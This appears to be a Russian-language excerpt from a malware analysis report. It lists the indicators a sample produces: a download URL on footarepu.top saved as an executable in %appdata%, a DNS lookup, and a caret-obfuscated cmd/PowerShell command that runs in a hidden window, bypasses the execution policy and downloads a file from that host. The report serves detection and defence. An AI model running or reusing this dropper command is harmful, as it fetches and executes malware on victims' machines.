Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POW^ER^Sh^el^L.^ex^E -eXeCuTIo^npo^lIC^y bYPaSS^ -^No^P^rOFi^L^e -WIN^DoW^sTyle^ ^HId^deN^ ^(Ne^W^-oBJec^T^ ^sy^ST^e^M.Ne^T.WebcLIEnT).^dO^WnLO^AD^fI^L^e^('http://footarepu.t...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "POW^ER^Sh^el^L.^ex^E -eXeCuTIo^npo^lIC^y bYPaSS^ -^No^P^rOFi^L^e -WIN^DoW^sTyle^ ^HId^deN^ ^(Ne^W^-oBJec^T^ ^sy^ST^e^M.Ne^T.WebcLIEnT).^dO^WnLO^AD^fI^L^e^('http://footarepu.t...' (со скрытым окном)